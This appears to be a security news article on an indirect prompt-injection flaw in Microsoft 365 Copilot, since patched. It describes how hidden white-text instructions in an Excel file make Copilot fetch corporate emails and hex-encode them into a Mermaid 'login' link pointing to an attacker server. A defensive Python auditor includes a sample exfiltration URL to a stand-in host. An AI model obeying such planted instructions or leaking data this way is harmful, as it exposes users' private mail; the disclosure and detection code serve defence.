A new and sophisticated vulnerability has been discovered in Microsoft 365 Copilot that could allow attackers to steal sensitive information (including recent emails) without the user noticing. It all happens through an indirect prompt injection technique that manipulates the behavior of the integrated AI.
The attack exploits how Copilot connects with Office documents and tools like Mermaid diagrams. This allows attackers to exfiltrate data with minimal user interaction—simply asking Copilot to summarize an apparently harmless file.
It begins when the user opens a maliciously crafted Excel spreadsheet and requests a summary. Hidden within the file are covert instructions, camouflaged in white text and spread across multiple sheets. These instructions trick Copilot into ignoring the original request and executing a series of concealed commands.
Among these is the activation of the search_enterprise_emails tool, which Copilot uses to retrieve recent corporate emails. Once obtained, the data is converted into hexadecimal code and split into small lines. This way, attackers bypass character limits imposed by Mermaid and extract the information without raising suspicion.
This type of attack demonstrates how powerful AI tools can be manipulated if not implemented with proper security measures. It also highlights the importance of carefully reviewing files before interacting with intelligent assistants—even in corporate environments.
This vulnerability leverages a legitimate feature of the AI assistant to embed hidden information into something as simple as a visual diagram.
The trick lies in having Copilot generate a Mermaid diagram. Mermaid is a JavaScript-based tool that creates flowcharts and graphs from text. In this case, the attacker designs the diagram to look like a “login button,” even decorating it with a lock emoji to make it more convincing.
That “button” is actually a disguised link: it contains hex-encoded data previously extracted from corporate emails via prompt injection. When the user clicks it, thinking they need to log in to view “confidential” content in the document, they are redirected to a server controlled by the attacker (such as a Burp Collaborator instance), where the data is silently transmitted and can be easily decoded.
This vector is particularly insidious due to the flexibility Mermaid offers, including custom CSS styles, embedded links, and even interactive content. Unlike other attacks where the attacker interacts directly with the AI, here the malicious commands are hidden within seemingly innocuous files—like an Excel spreadsheet, PDF, or even an email—making it ideal for highly evasive phishing campaigns.
Although this attack requires the user to click, it remains concerning due to how convincing the interface can appear. In previous incidents, exfiltration was achieved without any clicks, as seen with Mermaid in environments like Cursor IDE.
In this case, the payload was crafted after multiple tests and was inspired by prior Microsoft research on “task drift” in language models (known as TaskTracker). Although the issue was initially difficult to reproduce, Microsoft confirmed the vulnerability and released a patch in September 2025, completely disabling interactive links in Mermaid diagrams generated by Copilot.
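For teams that render AI-generated Mermaid in their own tools, the following added example (not code from the researcher or from Microsoft's patch) audits diagram source for links that carry long hex-encoded runs and strips interactive elements before rendering. The sample diagram, the host names, and the 16-byte hex threshold are constructed assumptions.

```python
import re
from urllib.parse import urlsplit

# Mermaid flowchart interaction syntax: click <node> [href] "<url>"
CLICK_RE = re.compile(r'^[ \t]*click\s+(\S+)\s+(?:href\s+)?"([^"]+)"', re.MULTILINE)
# HTML anchors embedded in node labels
ANCHOR_RE = re.compile(r'<a\b[^>]*href\s*=\s*["\']([^"\']+)["\']', re.IGNORECASE)
# 16 or more hex-encoded bytes in a row (assumed threshold; tune for your data)
HEX_RUN = re.compile(r'(?:[0-9a-fA-F]{2}){16,}')

def find_links(src):
    """Return every URL reachable through a click directive or an anchor tag."""
    return [m.group(2) for m in CLICK_RE.finditer(src)] + ANCHOR_RE.findall(src)

def audit(src, allowed_hosts=()):
    """Flag links that leave the allow-list or carry a hex-encoded payload."""
    findings = []
    for url in find_links(src):
        try:
            host = (urlsplit(url).hostname or "").lower()
        except ValueError:  # malformed URL: treat as external
            host = ""
        hit = HEX_RUN.search(url)
        preview = bytes.fromhex(hit.group())[:40].decode("utf-8", "replace") if hit else ""
        findings.append({"url": url, "external": host not in allowed_hosts,
                         "hex_payload": bool(hit), "decoded_preview": preview})
    return findings

def strip_interaction(src):
    """Drop click directives and anchor tags so the diagram renders as static."""
    lines = [l for l in src.splitlines() if not re.match(r'\s*click\s', l)]
    return re.sub(r'</?a\b[^>]*>', '', "\n".join(lines), flags=re.IGNORECASE)

# Constructed sample: a "login button" node whose link carries hex-encoded text
SAMPLE_HEX = "Subject: Q3 forecast".encode().hex()
SAMPLE = f'''flowchart TD
    A["Login to view content"]
    click A "https://collector.example/{SAMPLE_HEX}"
'''

if __name__ == "__main__":
    for finding in audit(SAMPLE, allowed_hosts=("intranet.example",)):
        print(finding)
    print(strip_interaction(SAMPLE))
```

Running `audit` on assistant output before it reaches a renderer gives a log entry to alert on, while `strip_interaction` removes the clickable element entirely.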
The timeline behind the discovery of this vulnerability in Microsoft 365 Copilot reveals that the process was not as smooth as one might expect. Although the issue was fully reported on August 15, 2025, following exchanges during the DEFCON security conference, there were several challenges in communication and technical validation between the researcher and the Microsoft Security Response Center (MSRC).
After multiple back-and-forths (including video demonstrations of the exploit) Microsoft officially confirmed the vulnerability on September 8 and released a patch on September 26, resolving the issue by removing interactive links from Mermaid diagrams within Copilot.
This case highlights a critical point: as AI tools like Copilot become more deeply integrated with APIs and internal systems, attack surfaces increase significantly—especially in environments handling sensitive data such as corporate emails, financial files, or confidential documents.
Microsoft has stated it is already working on long-term mitigations, but at TecnetOne we recommend staying vigilant. Verifying the source of documents before interacting with them via Copilot, and carefully analyzing AI-generated responses, are key practices to minimize risk.